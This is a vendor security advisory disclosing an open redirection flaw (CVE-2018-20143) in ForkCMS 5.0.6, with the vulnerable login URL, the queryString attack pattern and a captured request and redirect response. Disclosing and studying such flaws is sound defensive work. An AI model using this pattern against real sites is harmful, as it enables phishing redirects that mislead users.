Information
--------------------
Advisory by Netsparker
Name: Open Redirection vulnerability in ForkCMS
Affected Software: ForkCMS
Affected Versions: 5.0.6
Homepage: https://www.fork-cms.com/
Vulnerability: Open Redirection
Severity: High
Status: Not Fixed
CVE-ID : CVE-2018-20143
CVSS Score (3.0) : AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
Netsparker Advisory Reference: NS-18-032

Technical Details
--------------------

URL: http://{domain}/{forkcms_path}/{lang}/modules/profiles/login?queryString=http://netsparker.com
Parameter Name: queryString
Parameter Type: GET
Attack Pattern: http://netsparker.com

Request Headers

GET /modules/profiles/login?queryString=http://netsparker.com HTTP/1.1
Host: localhost
Cookie: PHPSESSID=m1k9ccmhmk4htctfo4tdkcg89q; interface_language=en; comment_author=3; comment_email=netsparker%40example.com

Response Headers

HTTP/1.1 302 Found
Set-Cookie: track=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.localhost; HttpOnly
Server: Apache/2.4.27 (Ubuntu)
X-Content-Type-Options: nosniff
Connection: Keep-Alive
X-XSS-Protection: 1; mode=block
Keep-Alive: timeout=5, max=79
X-Frame-Options: deny
Content-Type: text/html; charset=UTF-8
Location: http://netsparker.com
Content-Length: 360
Date: Sat, 21 Oct 2017 17:21:36 GMT
Cache-Control: no-cache, private

Advisory Timeline
--------------------

24th October 2017 - First Contact
31st December 2018 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Omer Citak while testing Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.